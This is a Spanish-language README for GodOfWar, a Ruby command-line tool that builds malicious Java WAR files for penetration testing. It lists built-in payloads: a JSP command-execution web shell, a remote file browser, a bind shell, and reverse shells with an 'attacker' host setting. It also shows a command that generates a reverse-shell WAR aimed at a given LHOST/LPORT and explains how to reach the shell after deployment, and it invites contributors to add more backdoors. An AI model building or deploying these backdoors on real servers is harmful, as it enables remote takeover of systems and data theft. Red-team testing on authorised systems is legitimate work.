
GodOfWar - Constructor malicioso de WAR en Java con payloads integrados
Una herramienta de línea de comandos para generar payloads WAR para pruebas de penetración / equipos rojos, escrita en Ruby.
.
hhh
hhhhhhh
hhhhhhhh
hhhhhhhh+
hhhhhhhh'
hhhhhhhh.
hhhhhhhhh
..-- hhhhhhhhh
-sh/.. +. hhhhhhhhh:
/+/:-/+ss-` hhhhhhhhhh:
/MMM`ss:``.` hhhhhhhhhh:
.MMMMM: hhhhhhhhhhhhhhhhh:
MMMMMMM: hhhhhhhhhhhhhhhh:
MMMMMMMMMMMMM: hhhhhhhhhhhhhhhh`
:NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`
./:`smdo+oos++- `++sNMMMMMNmh+
.-y-` ` :. / -dmddhhhhh-
o/- `//o/ /M/ `+hhhhhhhh`
/o :yosmy +y .`.hhhhhhhho
+` /../.: `.y::hhhhhs:`
` `+yys` .sy` /oohhy:
`/:s/-`` `.hh`
..` ` y+
.hNNmmNdymmmmds` :-
hs. ``.. :y- `
-hhmNmddm+ .
`NMMMMMMm
` `oMMy
`. /Md- :o
MMMMMMMMMMMMMMMMMMM:
MMMMMMMMMMMMMMMMMM:
MMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMM.
`MMMMMMMMMMMMM.
:sNMMMNMdo:
``+m:/-
`
GodOfWar - Constructor de WAR maliciosas en Java.
-l/--list)
--host/--port)$ gem install godofwar
$ godofwar -h
Menú de ayuda:
-p, --payload PAYLOAD Genera un war a partir de uno de los payloads disponibles.
(revisa -l/--list)
-H, --host IP_ADDR Dirección IP local o remota para el payload elegido
(se usa con -p/--payload)
-P, --port PORT Puerto local o remoto para el payload elegido
(se usa con -p/--payload)
-o, --output [FILE] Archivo de salida y nombre del despliegue.
(por defecto es el nombre original del payload. revisa '-l/--list')
-l, --list Lista todos los payloads disponibles.
-h, --help Muestra este mensaje de ayuda.
Listar todos los payloads
$ godofwar -l
├── cmd_get
│ └── Información:
│ ├── Descripción: Ejecución de comandos a través de interfaz web
│ ├── SO: cualquiera
│ ├── Ajustes: {"false"=>"¡No se requieren ajustes!"}
│ ├── Uso: http://host/cmd.jsp?cmd=whoami
│ ├── Referencias: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│ └── Ruta local: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│ └── Información:
│ ├── Descripción: Navegador remoto de archivos, subida, descarga, descompresión y ejecución nativa de comandos
│ ├── SO: cualquiera
│ ├── Ajustes: {"false"=>"¡No se requieren ajustes!"}
│ ├── Uso: http://host/filebrowser.jsp
│ ├── Referencias: ["http://www.vonloesch.de/filebrowser.html"]
│ └── Ruta local: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│ └── Información:
│ ├── Descripción: Shell TCP enlazada (bind shell)
│ ├── SO: cualquiera
│ ├── Ajustes: {"port"=>4444, "false"=>"¡No se requieren ajustes!"}
│ ├── Uso: http://host/reverse-shell.jsp
│ ├── Referencias: ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│ └── Ruta local: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│ └── Información:
│ ├── Descripción: Shell inversa TCP con un formulario HTML para establecer LHOST y LPORT desde el navegador.
│ ├── SO: cualquiera
│ ├── Ajustes: {"host"=>"attacker", "port"=>4444, "false"=>"¡No se requieren ajustes!"}
│ ├── Uso: http://host/reverse_shell_ui.jsp
│ ├── Referencias: []
│ └── Ruta local: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│ └── Información:
│ ├── Descripción: Shell inversa TCP. LHOST y LPORT están hardcodeados
│ ├── SO: cualquiera
│ ├── Ajustes: {"host"=>"attacker", "port"=>4444, "false"=>"¡No se requieren ajustes!"}
│ ├── Uso: http://host/reverse_shell.jsp
│ ├── Referencias: []
│ └── Ruta local: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
Generar payload con LHOST y LPORT
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy
Después del despliegue, puedes acceder a tu shell en (http://host:8080/puppy/puppy.jsp)
Para contribuir añadiendo más backdoors:
payloads.jsp dentro del directorio recién creado (con el mismo nombre del directorio).payloads_info.json con
La gema está disponible como código abierto bajo los términos de la Licencia MIT.